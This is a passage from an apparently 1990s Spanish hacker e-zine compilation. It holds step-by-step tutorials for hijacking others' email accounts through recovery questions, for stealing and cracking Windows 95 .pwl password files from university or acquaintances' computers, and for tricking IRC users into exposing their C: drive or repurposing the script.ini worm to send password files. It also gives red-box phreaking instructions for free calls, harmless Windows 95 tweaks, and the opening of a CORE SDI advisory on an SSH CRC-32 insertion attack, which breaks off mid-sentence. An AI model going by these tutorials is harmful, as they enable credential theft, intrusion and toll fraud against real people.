cuenta "pepe@latinmail.com" y que ese servicio de e-mail gratuito pone a disposicion de los usuarios el "recordatorio de contrase¤a". Hazte una cuenta en ese servidor para ver si ofrece ese servicio o no lo ofrece. Si lo hace (que sera lo mas probable), mira las opcion es que te da para recordarte la contrase¤a. Pongamos que te dan las opciones: "tu grupo de musica favorito", "la marca de yogures que compra tu madre" y "el nombre de tu discoteca favorita", vale ahora lo que tienes que hacer es, averiguar todas esas cosas que te dan opcion a recordar la contrase¤a de el. Una vez que lo hayas logrado intenta entrar en su cuenta de e-mail y si lo logras (que sera lo mas probable), intenta averiguar mas o menos sobre que dia le mandan los passwords, y listo a entrar en su cuenta de e-mail los dias que se las manden, y copiar el loggin y el password, pero ojo, no le borres los mensajes que le llegen con los passwords o se olera que alguien los a pillado y cambiara su cuenta de e-mail. Otra de las cosas que se pueden conseguir en el Irc, son los ya famosos ".pwl", que guardan las contrase¤as del Güindows, esto ultimamente se a convertido en algo dicifil de conseguir por que ya lo sabe todo el mundo pero prueba por si acaso. Pero claro un .pwl, si no lo "descompilas" y lo pasas a codigo "legible" no te vale para nada. Ahorate voy a ense¤ar como conseguir usar el ".pwl", que con tanto esfuerzo has conseguido sacarle a un pive que se conectaba desde una universidad (por ejemplo) (si heres universitario, estas de suerte. Pilla todos los ".pwl" que puedas de los ordenadores que esten conectados a una red o no, y a disfrutar cambiandote las notas o pillando el examen que tienes la semana que viene) Bueno supongo que ya tienes el .pwl del ordenador de tu universidad objetivo, bien ahora te estaras preguntando "¨y que co¤o hago yo con esto?", pos te lo explico ahora mismo :) . Lo primero que tienes que hacer es copiar las d.n.s de la universidad (o de donde sea el pwl) por que si no de poco te va a servir desencriptarlo. Vale supongo que ya tienes todo lo necesario de momento, osea el pwl, y las d.n.s. Bien ahora lo que tienes que hacer es lo sieguiente. La parte del texto que aqui se expone la ha hecho ToMaCHeLi y la voy a poner literalmente, tambien puedes bajarte el texto por separado en la pagina del HaCk`S-wEb-RiNg http://come.to/HaCkS-wEb-RiNg ------------------------------------------------------------------------------ @@@@@@@@@ By ToMaCHeLi @ PWL's @ By ToMaCHeLi @@@@@@@@@ ------------------------------------------------------------------------------ 1.- Introduccion. 2.- Que son?. 3.- Como conseguirlos. 4.- Como desencriptarlos. ------------------------------------------------------------------------------ 1.- Introduccion: ----------------- Bueno ante todo me he decidido a escribir este articulo para que veais la gran seguridad que tiene Windows 95 (ventanucos pa los amigos). Asi es que piensate antes de ponerte el Windows 98 (mas de lo mismo seguro). 2.- Que son?: ------------- Los PWL's son archivos donde Windows 95 guarda todas las contrase¤as del sistema (eso si para que queden almacenadas debes seleccionar el cuadro donde pone "Guardar contrase¤a"). Ejemplos pueden ser la contrase¤a de entrada a Windows 95, contrase¤a de entrada a una carpeta compartida en una red LAN, y algunas mas. Pero lo que mucha gente no sabe es que la propia contrase¤a de entrada a INTERNET se guarda en este archivo, incluido tambien el nombre de usuario. 3.- Como conseguirlos: ---------------------- Si sigues leyendo esto veo que te interesa, jeje. Estos archivos se encuentran en el directorio principal de Windows 95 que normalmente sera c:\windows. Para empezar a practicar un poco puedes coger tus propios PWL que tendras en el directorio antes mencionado, y si quieres arriesgarte un poco mas puedes intentar conseguir PWL's de otras maquinas. Si tienes acceso al ordenata de la universidad donde estudias, de un conocido (no amigo, que eso esta mu mal), de una feria de ordenatas, etc.. pos nada chico pilla los PWL (pero que no te pillen pillandos jeje, Ah! y esto yo no te lo he dicho) ;). Tambien puedes intentarlo por el IRC mediante ingenieria social (que no sabes lo que es????, ¨que haces leyendo esto tio? dejalo ya...) u otras tecnicas que sepas... 4.- Como desencriptarlos: ------------------------- Asi que ya tienes los archivitos eh?, entonces manos a la obra. Las maneras de desencriptarlos son diversas pero la mas facil que he encontrado es utilizando un par de herramientas destinadas para ello. Estas herramientas son el GLIDE y el PWLTOOL (cada una de ellas tiene sus ventajas e inconvenientes). Para usarlas yo recomiendo lo siguiente: Supongamos que tenemos el archivo Tom.pwl Lo primero que haria seria utilizar el GLIDE para ver si dentro de este archivo hay passwords para ello deberia verse algo asi al final del archivo: Recource[5] (2) Recource[6] (2) Recource[7] (2) Recource[8] (2) Recource[9] (2) Recource[10] (50) 0 -3*Rna\Servicom\a3004773@servicomA2D41B37 Recource[11] (2) Recource[12] (2) Recource[13] (54) 2 $ Todo -0e­yÃݤ®Ñù OIOIðgADMIN Recource[14] (2) Recource[15] (2) (Esos simbolos raros quieren decir que aqui existen passwords). Aqui lo importante seria: ------------------------- Nombre de usuario: a3004773@servicom Password: A2D41B37 (Esto es la conexion a INTERNET a traves de Servicom) (NO es verdadera por supuesto) :) ------------------------------------------------------------------------------ Si no existen passwords en el archivo (que tambien puede ser) se veria asi: (si te sale esto tira a la papelera el PWL) :)) Recource[5] (2) Recource[6] (2) Recource[7] (2) Recource[8] (2) Recource[9] (2) Recource[10] (50) Recource[11] (2) Recource[12] (2) Recource[13] (54) Recource[14] (2) Recource[15] (2) (aqui no hay passwords). Aqui lo importante seria: ------------------------- NADA NADA NADA NADA NADA NADA NADA NADA NADA Y NADA ----------------------------------------------------------------------------- Y te preguntaras, si ya aparece la password de INTERNET y el nombre de usuario con el GLIDE pa que usar el PWLTOOL????. Te explico, tengo comprobado que cuando la password de INTERNET supera los 8 digitos a partir del digito 8 ya no apareceran los restantes (joer explicate). Por ejemplo: Password verdadero : 795342A3B5 Password que aparece con el GLIDE: 795342A3 (fijate falta el B5) Pues este es el inconveniente que tiene el GLIDE y por eso se utiliza el PWLTOOL. Pero con este hay otro peque¤o inconveniente, resulta que para que salgan todos los password que hay dentro del PWL se necesita el password de entrada a Windows 95 (joer que lio). Ejemplo, tenemos el archivo Toma.pwl, este archivo debes ponerlo en el directorio de windows del ordenata de tu casa por ejemplo, despues reinicias el equipo para que te pida contrase¤a de entrada al equipo (esto activalo en el panel de control-contrase¤as), cuando te pida el nombre de usuario pon Toma (se me olvidava en los PWL el nombre del archivo es siempre el nombre del usuario, ejemplo Toma.pwl Nombre de usuario: Toma). Ahora viene lo malo, sabes la contrase¤a de ese nombre de usuario??, si la sabes la pones y ya esta entras en Windows 95 ejecutas el PWLTOOL y .. TACHAN!!! todas las passwords que contiene el PWL te seran desveladas sin el inconveniente que tiene el GLIDE (lo de los 8 digitos, recuerdas??). (Pa los que no tienen la contrase¤a del nombre de usuario de windows) Pero y si no sabes la contrase¤a de entrada a Windows con ese nombre de usuario?? Arggg, eso se complica, entonces deberas usar el PWLTOOL en el que una de sus opciones es la de utilizar un diccionario de palabras para sacar la contrase¤a del nombre de usuario del archivo PWL (y esto no es facil..., pero se puede conseguir). Tambien puedes pensar otras maneras de utilizar el PWLTOOL pero eso te lo dejo a ti no te voy a decir todo macho (o gachi lo que seas, una gachi hacker??, que raro no hay muchas...). Por mi parte es todo, espero que os haya servido de ayuda todo este rollo. Si algunno quiere a¤adir o corregir algo que me avise. ****************************************************************************** Este articulo es de libre distribucion (siempre que no modifiques nada, o te buscare hasta la muerte jeje), ademas no me hago responsable de lo que puedas llegar a cometer con su contenido. ****************************************************************************** Articulo realizado para el grupo Hack's-Web-Ring. Realizado por: --- ToMaCHeLi --- WEB: http://members.tripod.com/~tomacheli MAIL: tomacheli@geocities.com Un saludo pa todos los del grupo :) -----------------fin del texto escrito por ToMaCHeLi-------------------------- bien despues de esto supongo que estras deseando entrar en el Irc y empezar a actuar, pero antes de hacer eso te recomiendo que sigas leyendo por que voy a pasar a explicarte algunos trucos quete facilitaran la vida en el Irc. Muchas veces lo de la ingenieria social no funciona y pillar un pwl apartir de este metodo se esta convirtiendo cada dia mas dificil, pero existe un comando que te puede facilitar las cosas por que no todo el mundo lo conoce (y sobre todo los novatos) el comando en cuestion es el siguiente: /fserve el_nick_que_uses 5 c:\ si haces que un usuario ponga este comando en el canal, privado, Dcc-chat.... lo que hara este comando es darte acceso a su unidad c:\, el peque¤o inconveniente que tiene esto es que el pive antes de darte acceso le saldra un mensage que le dira que te va a dar acceso a su unidad c:\, el mensage en cuestion sale en ingles, osea que si tienes suerte y el pive no controla mucho ingles, pasara de leer el mensage y aceptara sin pedirte ninguna explicacion. Seguro que has oido hablar del archiconocido "virus" del "script.ini" como sabras este "virus" lo que hace es que cuando entras en un canal enviasa todos los alli presentes este archivo, pero.... ¨has probado a modificar este "ini" para que envez de mandar el "script.ini", mande el "c:\windows\*.pwl"? investiga que esto puede ser muy interesante. Otra opcion que tienes si tienes algo de idea de "scripting" es modificar la parte del fserver del script que uses para que envez de que cuando te den acceso a un fserver en la carpeta que ellos elijan te lo den en "c:\" o en "c:\windows", esto no se de que manera se puede hacer, pero me han dicho que si se puede,osea que andaros al loro y echad un vistazo de vez encuando a las personas que esten en vustro fserver, para ver por donde andan y lo que se estan bajando. pues eso es todo, si tienes alguna duda, sugerencia o simplemente quieres decirme algo referente a este texto, puedes hacerlo escribiendo a: zed@mixmail.com !!feliz irc-hack a todos­­ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ZeD no se hace responsable de las consecuencias que te pueden suceder si usas mal cualquier informacion aqui dada, pero te recomienda que no uses nada de lo aqui escrito (por tu bien) puedes subir este texto a tu web, bbs o distribuirlo de la manera que te de la gana siempre y cuando mantengas este encabezado, no alteres ninguna parte del texto y me avises antes a zed@mixmail.com ------------------------------------------------------------------------------ ############################################## # PHREACKING PARA NOVATOS # ############################################## por ZeD---http://www.angelfire.com/ak/HACKZED/ZED2.html ---http://come.to/HaCkS-wEb-RiNg (miembro del HaCk`S-wEb-RiNg) 1.¨que es phreackear? 2.¨por que phreackear? 3.reglas 4.¨como empezar en esto del phreacking? 5.descripcion brebe de las BOXES 6.RED-BOXING 7.despedida y cierre ------------------------------------------------------------------------------ 1. ¨QUE ES PHREACKEAR? phreackear es simplemente hacer cualquier tipo de llamadas (provinciales, internacionales) completamente sin pagar un duro, tener un conocimento + o - completo de la red de telefonia y de que se puede hacer con ella, como usar determidas cosas para no pagar un servicio que deveria ser mucho mas barato, ya que es algo que se ha convertido en algo INPRESCINDIBLE. 2. ¨POR QUE PHREACKEAR? la explicacion es muy simple,piensalo de esta manera: ¨por que tengo que pagar una factura que cada dia es mas elevada por usar un SERVICIO de maxima NECESIDAD? ¨por ademas de ahorrar pagar la luz el agua...etc... que tambien son SERVICIOS de maxima NECESIDAD, tambien lo tengo que hacer para pagar el telefono? pues por una razon muy simple, las compa¤ias telefonicas abusan de los consumidores que usan un SERVICIO cobrandoles mucho mas de lo que deveria costar, solo por que es NECESARIO, ademas, ellos nos enga¤an con "PLANES CLAROS" y demas jilipolleces que luego siempre son mentira, ¨por que no les vas a poder enga¤ar tu a ellos tambien? 3. REGLAS DEL PHREACKING como en todo, aqui tambien hay que seguir unas reglas, que mas que PENALES, son MORALES. 1- no uses nunca una BOX con tu propia linea telefonica (seria de tontos hacerlo) 2- no hablar de tus proyectos phreackers por telefono (lo mismo de arriba) 3- no uses tu nombre real cuando estes haciendo phreack (no tengo que decirtelo ¨verdad?) 4- todos los materiales que uses debes guardarlos en buen sitio, no es conveniente que vallas dejando las cosas por hay tiradas para que la gente las vea 5- (y aunque se contradiga con la primera) no es bueno joder a otra persona, que como tu esta siendo abusado por una compa¤ia telefonica, intenta usar siempre lineas de empresas multimillonarias o cosas asi (aunque esto conlleva un mayor riesgo claro) 4. ¨COMO EMPEZAR EN ESTO DEL PHREACKING? lo primero que tienes que hacer es construir los BOXES que vallas a usar en tus "sesiones" de todas maneras si tienes problemas al construirlos siempre hay otras alternativas... ;-) para empezar a phreackear lo que tienes que hacer es elejir bien los sitios donde lo vallas a hacer, como heres nuevo en esto, tardaras algo mas de tiempo que uno que ya controla del tema por lo tanto te recomiendo que uses sitios poco transitados y que lo hagas siempre de noche. 5. DESCRIPCION DE LAS BOXES nombre de la BOX UTILIDAD --------------------- ---------------- RED-BOX-------------------genera tonos para llamadas gratis BLACK-BOX-----------------cuando se llama,el que llama no paga un duro BEIGE-BOX-----------------llamas con la linea de otra persona(la unica que funciona en espa¤a) GREEN-BOX-----------------genera tonos de llamada a cobro revertido CHEES-BOX-----------------cambia tu telefono a modo "cabina telefonica" ACRILIC-BOX---------------roba 3 vias de linea WATER-BOX-----------------detine el rastreo de la policia BOX-LANZAMIENTO-----------amplificador para el microfono del telefono BOX-BORRON(near)----------corta todas las lineas de tu area MAROON-BOX----------------crea una "party line" BOX-BROTE-----------------llama a los telefonos de tus vecinos CHROME-BOX----------------manipula las se¤ales de trafico BOX-CLARA-----------------llamdas gratis COLOR-BOX-----------------graba las conversaciones telefonicas BOX DE COBRE--------------causa interferencias entre dos lineas que se esten usando INFINITE-BOX--------------telefono de uso remoto BOX-ARCO IRIRIS-----------corta cualquier rastreo en la linea existen mas boxes pero estas son las mas interesantes. 6. RED-BOXING aqui te voy a explicar como hacer una red-box: lo primero que tienes que hacer es ir a tienda de radio y comprar un dialer que sea de tonos (un marcador de tonos valla) y un cristal de 6,5536 Mhz abre el marcador y quita el cristal que lleva, ahora mete el de 6,5536 Mhz (el que has comprado tu) cierras el marcador y EVOILA ya tienes tu red-box. estos es muy bonito ¨pero como lo uso ahora? te estaras preguntando (joder que impacientes sois) para hacerlo funcionar tienes que hacer lo siguiente: cuando te pidan 25pts para la llamada en el marcador tienes que pulsar "5*'s" por ejemplo (sin las comillas obviamente) cuando son 5pts "1*." cuando son 10pts hay que marcar "3*'s" y asi ¨a que no es dificil? 7. DESPEDIDA Y CIERRE bueno pues esto es todo espero que esto te aya servido de referencia si estas empezando en esto del phreacking y si ya eres un entendido para recordarte algo que se te avia olvidado, en fin que me aya tirado 15 minutos, para que valga de algo jo¤e bueno si me quereis comentar algo ya sabeis que podeis escribirme a zed@mixmail.com y que todo lo que he dicho a qui no es mas que una guia para que aprendas, pero no para que uses lo que aprendas 8-), pero si lo haces....aya tu bye <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ############################################ # como trucar el Güindows95 # ############################################ texto escrito por ZeD--www.angelfire.com/ak/HACKZED/ZED2.html --http://come.to/HaCkS-wEb-RiNg puedes subir este texto a tu web,bbs,ftp o lo que sea,siempre que mantengas este encabezado. ACTUALIZACION:10/8/98 ZeD no se hace responsable de los da¤os que el uso de este documento pueda ocasionar a tu pc y te recomienda siempre hacer copias de seguridad (por si las moscas) INDICE: 1.como trucar el internet explorer 2.pon el nombre que quieras a la papelera de reciclaje 3.cambia el icono de las carpetas por el que tu quieras 4.interface de 3.11 en w95 5.crear un acceseo directo para apagar el pc 6.cambiar el nombre de "mi pc" 7.MS2.sys 8.utilidades del sistema 9.PROXImamente ------------------------------------------------------------------------------ 1.COMO TRUCAR EL INTERNET-EXPLORER v3.1 en adelante simpre has querido cambiar el dibujio de la "E" que sale cuando estas navegando con el internet-explorer, pues es bien simple. La imagen que sale es un archivo ".bmp" que esta en la carpeta ..../internet explorer/ son los archivos que se llaman "Ani38.bmp" y "Ani26.bmp" abrelos y mira como son. Veras que son como una tira que segun la vas bajando se convierte en una animacion. Vale pues ahora crea tu logo tal como esta definido en los archivos cambialo y ya tienes el explorer trucado (puedes bajarte algunas imagenes de mi pagina que esta en: www.angelfire.com/ak/HACKZED/ZED2.html,en la seccion "download") 2.COMO CAMBIAR EL NOMBRE A LA PAPELERA DE RECICLAJE cambiar el nombre de la papelera de reciclaje es muy simple: cambia el nombre en la clave del "regedit":(esta en la carpeta "windows") HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E 3.CAMBIAR EL ICONO DE LAS CARPETAS POR EL QUE TU QUIERAS para cambiar el icono que representa las carpetas tienes que hacer lo siguiente: Muchos de los iconos que por defecto traen algunos archivos se pueden cambiar simplemente desde cualquier carpeta, mediante el menu ver, luego opciones... , tipos de arhivos y por ultimo editar, e inmediatamente despues selecionar cambiar icono. Pero esto no siempre nos vale, sobre todo si queremos cambiar los iconos de por ejemplo, las carpetas, el menu de Inicio... Para ello el truco es el siguiente: Lo primero que tenemos que hacer es saber el icono que queremos cambiar... por ejemplo, para cambiar el icono de las carpetas, debemos ejecutar el registro, irnos a la seccion HKEY_CLASSES_ROOT\Folder\DefaultIcon en la parte derecha aparecera (preterminado) "C:\WINDOWS\SYSTEM\shell32.dll,3", la primera idea.. que no funciona :) es ir y cambiar directamente el valor de la cadena para poner el icono que queremos. Pero lo que tenemos que hacer es ir a la seccion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ explorer y crear una nueva clave, Shell Icons, despues creamos un nuevo valor de la cadena, con el numero del icono indicado en el DefaultIcon que queremos cambiar, en nuestro caso el 3, seleccionamos este valor, pulsamos 2 veces y en Informacion del valor introducimos el path del archivo que tiene el icono que queremos poner, con su numero correspondiente. En mi caso es: nombre | datos (predeterminado) (valor no establecido) 3 "c\iconos\folders.icl,70" Bueno.. ya hemos hecho lo mas dificil. Pero aun queda algo mas. Windows 95 guarda una cache de Iconos en el directorio de instalacion del 95, llamado ShellIconCache, este archivo esta oculto. Debemos de borrar este archivo para que los cambios surjan efecto, pero hay que borrarlo fuera de la sesion de Windows.. osea.. que hay que reiniciar en modo MS-DOS, quitar los atributos al archivo (en MSDOS este se llama shelli~1), borrarlo y reiniciar el entorno grafico (hoy en dia llamado sistema operativo.. :P) y ya esta, tenemos nuestro icono favorito como icono de carpeta.. :) De igual manera con el resto de los iconos del 95. PD: Importante, si tenemos la utilidad TWEAK UI de las Powertoys de Microchof (si, MICROCHOF... ) podemos borrar el cache de iconos desde la pesta¤a Repair, con el boton Rebuid Icons. Y si tenemos el MicroAngelo.. todo esto nos lo hace ese fantastico programa.. pero conviene saber hacer las cosas "a pelo". 4.INTERFACE DEL W3.11 EN EL W95 este es bastante mas simple que el anterior, lo que tienes que hacer es lo siguiente: 1- edita el archivo "SYSTEM.INI" (directorio de windows) 2- en la seccion "BOOT", busca la linea que pone "SHELL=EXPLORER.EXE" 3- cambia lo de "EXPLORER.EXE" por "PROGMAN.EXE" 4- reinicia el pc y listo. 5.ACCESO DIRECTO PARA APAGAR EL PC esto es de lo mas simple, haz lo siguiente: crea una cceso directo en el escritori,vete a propiedades y en loreferente a acceso direco busca "DESTINO".alli pones lo siguiente: C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows le das a aplicar, acetar y ya esta. 6.cambiar el nombre de "MI PC" para hacer esot tienes que seguir los siguientes pasos: vete al "REGEDIT" cambia la clave:: HKEY_CLASSES_ROOT\CLSID\{2OD04FE0-3AEA-1069-A2D8-08002B30309D} pon el nombre quele quieras poner a "MI PC" y ya esta. 7.MS2.sys lo primero que tienes que hacer es localzar este archivo, una vez encontrado, para poder editarlo tendras que cambiar sus atributos. una vez puedas editarlo, dirijete a la parte de "OPTIONS": [Options] BootDelay = 0 Aumenta la velocidad de booteo,el mensaje "Starting Windows.." no aparece. BootMenu = 1 Despliega automaticamente el menu de arranque de WIndows 95. BootMenuDefault = 1 El numero de opcion por default. BootMenuDelay = 10 Numero de segundos que el menu de inicio es desplegado. Logo = 0 No despliega la imagen del logo de arranque de Win95. BootMulti = 1 Hace disponible un doble booteo con DOS. 8.UTILES DEL SISTEMA el w95 trae algunas erramientas que te permitiran hacer cosillas (algo basicas) muy interesantes para ir empezando, aqui te voy a explicar el funcionamiento de dos de ellas el Telnet, un viejo amigo que ya conoce todo el mundo y el Ftp, si si, has leido bien el 95 (bueno en realidad el MS2) trae una version bastante simple (pero util) de programa FTP. TELNET. en la carpeta windows (o como la ayas llamado) hay un .exe que se llama Telnet, este programa sirve para hacer conexiones desde tu sistema a otro remoto a traves de una red (internet principalmente), en lo que consiste basicamente este programa es en acceder a unos determinados puesrtos de un sistema remoto en los cuales puedes hacer varias cosas, como por ejm: bajarte el correo,mirar el directorio de una web..... aqui te expongo una lista de los puertos con una descripcion de para lo que vale cada uno de ellos: (el numero que aparece entre parentesis es el puerto) auth (113) conference (531) courier (530) daytime (13) discard (9) domain (53) echo (7) efs (520) exec (512) finger (79) ftp (21) gopher (70) hostnames (101) http (80) ingreslock (1524) link (87) login (513) mtp (57) nameserver (42) netbios (139) netnews (532) netstat (15) nntp (119) pop2 (109) pop3 (110) proxy (8080) qotd (17) remotefs (556) rje (77) sftp (115) shell (514) smtp (25) spooler (515) sunrpc (111) supdup (95) systat (11) telnet (23) tempo (526) tftp (69) time (37) uucp (540) uucp-path (117) whois (43) www (80) ¨como se hace un Telnet? pues hacerlo es muy simple: si nos proporcionan la direccion telnet "maquina.remota.es 2010" hariamos lo siguiente: (puede variar segun sistemas): * Tecleamos en la linea de comandos "TELNET maquina.remota.es 2010" (En otros sistemas teclearemos "TELNET" y después "OPEN maquina.remota.es 2010" ) con lo que veremos algo parecido a esto: * telnet MAQUINA.REMOTA.ES 2010 * Trying 130.132.21.53 Port 2010 ... * Connected to MAQUINA.REMOTA.ES * Escape character is ... * Esto nos dice mas o menos que esta intentando conectar con la direccion, nos devuelve la direccion IP, se conecta, y nos dice cual es el "caracter escape". * Una vez hemos conectado se nos pide un "login" y/o "password" para entrar a la maquina remota. En algunos casos podremos conectar a la maquina remota con el login "guest" (invitado) pero la mayoria de las veces deberemos saber el login antes de conectarnos. * El siguiente paso es configurar la emulacion de terminal, es decir, decirle al sitio remoto como queremos que nos muestre los datos en nuestra pantalla. La configuracion mas comun es la VT100, que es la estandar para las comunicaciones basadas en terminales. (algunos clientes telnet configuran ellos la emulacion). * El ultimo paso (despues de haber utilizado el servicio es salir ;-) Como las pulsaciones de tecla no las hacemos "realmente" en nuestra maquina, sino en la maquina remota, necesitamos el "caracter escape" que se nos dia al conectar para pasar al "modo comando" ( habitualmente teclas control + parentesis derecho ). Comandos disponibles: CLOSE Termina la conexion TELNET con la maquina remota y vuelve al "modo comando" (si empezamos alli) o sale de TELNET. QUIT Sale del programa TELNET; si estas conectado a una maquina remota, QUIT te desconecta y luego sale de TELNET. SET ECHO Si no ves lo que estas escribiendo, o si escribes y ves doble, este comando soluciona el problema. OPEN Abre una conexion a una maquina remota. ATENCION: Al presionar las teclas Enter o Return, sales del modo comando TELNET y vuelves a la sesion TELNET. te dejo aqui, investiga y juega con telnet, no es muy dificil y pronto aprenderas a usarlo de una manera mas "productiva". FTP-MS2 si entras en Ms2 y en el promp pones "ftp" te saldra esto "ftp>" ahora parasaber los comandos que puedes usar pon "?" y te saldra una lista de los comandos que puedes usar en el programa, juega con ellos y prueba cosas 9.PROXImamente.... pues la verdad es que no se que voy a incluir, si tienes algo que comentar o quieres mandarme cosas nuevas ya sabes mandamelas a zed@mixmail.com y sera incluido en la proxima actualizacion bye--:) <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> CORE SDI S.A. Buenos Aires, Argentina Advertencia de Seguridad 11 de Junio de 1998 Ataque de insercion a SSH Esta advertencia trata sobre un problema de seguridad presente en el paquete de software SSH que permite a un atacante ejecutar comandos arbitrarios en el servidor SSH o, de manera mas general, insertar datos arbitrarios en un canal SSH encriptado. Descripcion del problema ~~~~~~~~~~~~~~~~~~~~~~~~ SSH (Secure Shell) es un programa que proporciona autenticacion fuerte y comunicaciones seguras sobre canales inseguros. Es ampliamente usado para sesiones interactivas remotas, transferencia de archivos y encapsulado de otros protocolos en un tunel sobre un canal de comunicacions encriptado. Todas las comunicaciones son encriptadas automaticamente y de manera transparente. La encripcion es tambien utilizada para realizar chequeo de la integridad de los datos, sin embargo implementaciones actuales se basan en un Chequeo Ciclico de Redundancia de 32 bits (CRC-32) para verificar la integridad despues de la desencripcion de un paquete SSH recibido. La encripcion se realiza utilizando uno de los algoritmos soportados tanto por el cliente como el servidor. Una vez establecida una conexion entre cliente y servidor, ambos realizan un protocolo de negociacion que incluye autenticacion mutua, eleccion de un algoritmo criptografico a utilizar e intercambio de una clave de sesion a utilizar con dicho algoritmo. Terminada la negociacion se activa la encripcion, todo comunicacion subsiguiente esta encriptada. Los algoritmos de encripcion soportados por la version actual de SSH son: - Blowfish Encriptor de bloque de Bruce Schneier con clave de 128 bits. - IDEA Encriptor de bloque con clave de 128 bits. - DES Data Encrryption Standard, encriptor de bloque con clave de 56 bits - Triple DES (3DES) Version triple de DES con tres claves para un total efectivo de 112 bits de clave. - ARCFOUR Encriptor de canal compatible con RC4 con clave 128 bits El uso de estos algoritmos en modo CBC (Cipher Block Chaining) o CFB ( Cipher FeedBack 64 bits) en conjuncion con CRC-32 para realizar chequeo de integridad posibilita un ataque de texto conocido (known plaintext attack) con tan solo 16 bytes de texto conocido (8 para el caso de IDEA en modo CFB) que permite a un atacante insertar paquetes encriptados en el canal de comunicacion entre cliente y servidor que pasaran las pruebas de integridad y se desencriptaran a el texto en claro enviado. De esta manera, un atacante podra ejecutar comandos arbitrarios en el servidor. El mismo ataque puede realizarse sobre el cliente, aunque solo hace posible el envio de datos arbitrarios a la terminal del cliente. Las implicacias de un ataque al cliente son tal vez no tan como un ataque al servidor pero aun asi deben ser consideradas durante el proceso de solucion del problema. Detalles tecnicos ~~~~~~~~~~~~~~~~~ Despues de la fase de identificacion del protocolo, donde el servidor envia un string de texto en claro especificando su version de protocolo y de software, toda la comunicacion se realiza encapsulando los datos en un formato de paquetes descripto como "The Binary Packet Protocol" [1] Se indica dicho formato a continuacion: 32 24 16 8 0 +----------+---------+---------+---------+ | data length (bytes) | +----------+---------+---------+---------+ | de 1 a 8 bytes de relleno | = ( padding ) = +----------+---------+---------+---------+ | type | | +----------+ + | | = data = | | +----------+---------+---------+---------+ | CRC-32 | +----------+---------+---------+---------+ Data length: Tamanio en bytes del paquete, sin incluir el campo 'length' y los bytes de relleno. Padding : 8 - (length mod 8) byte de datos aleatorios. El uso de datos aleatorios al principio del paquete es un inteto por hacer mas dificiles ataques de texto en claro conocido (known plaintext attacks) Packet type: Un byte sin signo de 8 bits Data : length - 5 bytes de datos CRC-32 : 4 bytes para el chequeo de integridad. El CRC se calcula antes de realizar la encripcion. La encripcion se realiza sobre los campos 'padding', 'type', 'data' y 'CRC', el campo 'length' nunca se encripta. La parte encriptada del paquete tiene un tamanio que es siempre multiplo de 8 bytes. Conociendo ciertas caracteristicas de los modos de encripcion utilizados (CBC por ejemplo), con un texto en claaro conocido, un atacante puede construir un paquete SSH propio ( del tipo SSH_CMSG_STDIN_DATA) con los bytes de relleno calculados de tal manera que los siguientes 8 bytes del paquete se desencriptaran a un texto en claro a eleccion del atacante. En este caso en particular, los bytes desencriptados corresponderan al campo 'type' y 7 bytes de datos. Despues de esto 16 bytes (relleno+tipo+7 bytes de datos) el atacante debe incluir una cantidad variable de bytes calculados con el proposito especifico de producir un CRC-32 valido para todo el paquete una ves que el mismo es desencriptado. Este ataque y variaciones utilizando la misma tecnica puede realizarse debido al uso de un esquema de verificacion de integridad que es inherentemente debil. En particular CRC-32 posse ciertas propiedades que permiten al atacante generar un paquete con datos arbitrario y aun asi obtener un valor de CRC que es valido. Por supuesto que para que este ataque sea exitoso el atacante debe tener acceso al canal encriptado entre cliente y servidor, ya sea realizando un ataque activo de red, interponiendose entre cliente y servidor a nivel de aplicacion SSH o realizando un ataque de toma de sesion TCP. Un ataque de este ultimo tipo se describe en [6] y para el caso de SSH los dos metodos de de-sincronizacion de TCP mencionados pueden ser utilizados. Especificamente, el metodo descripto como "Null data desynchronization" puede 